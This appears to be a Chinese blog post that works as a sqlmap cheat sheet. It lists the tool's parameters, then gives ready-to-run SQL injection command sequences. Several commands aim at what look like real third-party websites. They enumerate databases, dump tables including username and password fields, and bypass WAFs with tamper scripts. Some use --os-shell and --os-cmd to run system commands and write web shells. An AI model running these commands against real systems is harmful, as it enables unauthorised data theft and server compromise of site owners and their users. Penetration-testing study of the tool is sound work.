SQLMAP的常用参数

-p            指定测试参数
-b            获取banner
--dbs           列举数据库 
--is-dba        是否是管理员权限
--current-db        当前数据库
--current-user        当前用户
--tables        列举数据库的表名
--count            检索所有条目数
--columns        获取表的列名
--dump             获取表中的数据,包含列 
--dump-all        转存DBMS数据库所有表项目
--level            测试等级(1-5),默认为1
-v               显示详细信息
--delay 1(1秒)表示延时1秒进行注入

读取数据库--->读取表---->读取表的字段---->获取内容

-D              指定数据库

-T            指定表

-C            指定字段

--dbms=mysql  oracle mssql         指定数据库
=======================================

参照官方文档:https://github.com/sqlmapproject/sqlmap/wiki/Usage。
--safe-url:提供一个安全不错误的连接,每隔一段时间都会去访问一下。
--safe-freq:提供一个安全不错误的连接,每次测试请求之后都会再访问一边安全连接。
-b    获取banner
-p    指定测试参数
-g    从google中获取URL , -g "inurl:aspx?id="
--gpage=GOOGLEPAGE    指定Google页码
--union-check    是否支持union 注入
--union-cols     union 查询表记录
--union-test     union 语句测试
--union-use     采用union 注入
--proxy    代理注入
---threads    采用多线程
--user-agent     自定义user-agent
--referer=REFERER    HTTP referer头
--proxy=PROXY    使用代理
--string    指定关键词
--tor    创建tor的匿名网络
--predict-output    常见的查询输出预测
--keep-alive    使用持久HTTP(S)连接
--eval=EVALCODE    所使用HTTP参数污染
-a,-all    查询所有
--hostname    主机名
--is-dba    是否是管理员权限
--users    枚举所有用户
--passwords    枚举所有用户密码
--roles    枚举所有用户角色
--schema    枚举DBMS模式
--count    检索所有条目数
--dump    转存DBMS数据库表项目,需要制定字段名称(列名称)
--dump-all    转存DBMS数据库所有表项目
--search    搜索列,表或数据库名称
--exclude-sysdbs    在枚举表时排除系统数据库
--sql-query=query    执行SQL语句
--file-read=RFILE    读取操作
--file-write=WFILE    写入操作
--file-dest=DFILE    绝对路径写入
--reg-read    阅读一个Windows注册表项值
--reg-add    增加一个Windows注册表项值数据
--reg-del    删除一个Windows注册表项值数据
--reg-key=REGKEY    Windows注册表键
--reg-value=REGVAL    Windows注册表键值
-- reg-data=REGDATA    Windows注册表的键值项数据
--reg-type=REGTYPE    Windows注册表键的值类型
--csv-del=CSVDEL    划定CSV输出中使用的字符 (default ",")
--dump-format=DUMP    转存数据格式(CSV (default), HTML or SQLITE)
--hex    使用十六进制数据检索功能
--output-dir=ODIR    自定义输出的目录路径
--update    更新SQLMap
--purge-output    安全的删除所有内容输出目录
--check-waf    启发式检查WAF / IPS / IDS保护
--os-pwn    反弹shell
--cookie=COOKIE    指定HTTP Cookie ,预登陆
--random-agent    使用随机选定的User-Agent头
--tamper=TAMPER    使用SQLMap插件
--level    测试等级(1-5),默认为1
====================================================
加载tamper脚本过waf
sqlmap.py -u http://127.0.0.1/test.php?id=1 –tamper “space2morehash.py”//脚本的名称
====================================================
asp注入
sqlmap -u http://xaweichi.com/product_list.asp?id230 --tables //猜解表段 
sqlmap -u http://xaweichi.com/product_list.asp?id230 --columns -T manage //猜解 字段 
sqlmap -u http://xaweichi.com/product_list.asp?id230 --dump C "classid,id" -T manage //猜字段内容
====================================================
php的注入 
sqlmap -u http://www1.upweb.net/book/subject.php?id156 --dbs //猜解数据库 
sqlmap -u http://www1.upweb.net/book/subject.php?id156 -D www1topxx数据库 --tables //猜解这个数据库的表
sqlmap -u http://www1.upweb.net/book/subject.php?id156 -D www1topxx -D www1topxx --columns -T user1表名 //猜解这个表里面的字段 
sqlmap -u http://www1.upweb.net/book/subject.php?id156 -D www1topxx -D www1topxx --dump C "user_name,user_pass"//两个字段名称 --columns -T user1 //猜解这个字段的内容
====================================================
post搜索框的注入 
http://www.zjyingsong.com/product.asp
post注入框的注入原理 大家可以自己百度一下哦!
要进行post注入我们首先要抓包 。。
随便输入一个1字 burpsuite已经抓到包了
抓到的发包内容key1&x23&y4
sqlmap -u http://www.zjyingsong.com/product.asp --data "key1&x23&y4" --tables //猜解表段
sqlmap -u http://www.zjyingsong.com/product.asp --data "key1&x23&y4" --columns -T 表段 //猜解字段
sqlmap -u http://www.zjyingsong.com/product.asp --data "key1&x23&y4" --dump C "内容,内容," -T 刚才的表段 //猜解内容  
====================================================
cookies站点的注入 
sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --level 2 //判断

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --tables --level 2 //猜解表名

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --columns -T manage --level 2 //猜解字段

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --dump C "classid,id" -T manage --level 2  //猜解字段内容
====================================================
sqlmap-Access数据库注入
sqlmap.py -u http://www.t00ts.net/test.asp?id=123 --tables //猜解表名
sqlmap.py -u http://www.t00ts.net/test.asp?id=123 -T "表名" --columns  //猜字段
sqlmap.py -u http://www.t00ts.net/test.asp?id=123 -T "表名" -C "字段名" --dump //猜字段内容
====================================================
sqlmap-Mysql数据库注入
sqlmap.py -u http://www.t00ts.net/test.php?id=123 --dbms "Mysql" --current-user //* 注解:获取当前用户名称
sqlmap.py -u http://www.t00ts.net/test.php?id=123 --dbms "Mysql" --current-db //*当前数据库
sqlmap.py -u http://www.t00ts.net/test.php?id=123 --dbms "Mysql" --tables -D "数据库名" //*猜数据库表
sqlmap.py -u http://www.t00ts.net/test.php?id=123 --dbms "Mysql" --columns -T "表名" -D "数据库名"
====================================================
post注入
1.抓包注入
C:\sb.txt >>>>>>>>数据包的储存地址,//地址没有存储限制
sqlmap -r C:\sb.txt --dbs -v 2 //列数据库
sqlmap -r C:\sb.txt --tables -D "数据库名称" -v 2 //列出表名
sqlmap -r C:\sb.txt --columns -T "表名" -D "数据库名称" -v 2 //列出字段
sqlmap -r C:\sb.txt --dump -C "猜解的内容,猜解的内容" -T "表名" -D "数据库名称" -v 2//猜内容

sqlmap -r C:\sb.txt -P xxxx //-P指出特点参数

sqlmap.py -u http://127.0.0.1/login.asp --forms //自动寻找注入参数
sqlmap.py -u http://127.0.0.1/login.asp --data "xx=xx&xx=xx" //指定参数
====================================================
交互写shell及命令执行
sqlmap.py -u 127.0.0.1/asp.asp?id=1 --os-cmd=ipcomig //执行cmd命令ipcomig
ps:会提示选择脚本,写出网站根目录。
sqlmap.py -u 127.0.0.1/asp.asp?id=1 --os-shell//也可以执行cmd命令,会在网站根目录生成两个为tmpbxbxz.php和tmpuoiuz.php,tmpbxbxz.php这个文件可以上传一些脚本。
====================================================
伪静态注入
sqlmao.py -u 127.0.0.1/100*.html //.html前面加*这么一个字符进行操作

====================================================
请求延时注入
sqlmap.py --dbs -u 127.0.0.1/100*.html --delay 1 //延时一秒访问,进行采集数据库
sqlmap.py --dbs -u 127.0.0.1/100*.html --safe-freq //--safe-freq:提供一个安全不错误的连接,每次测试请求之后都会再访问一边安全连接。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值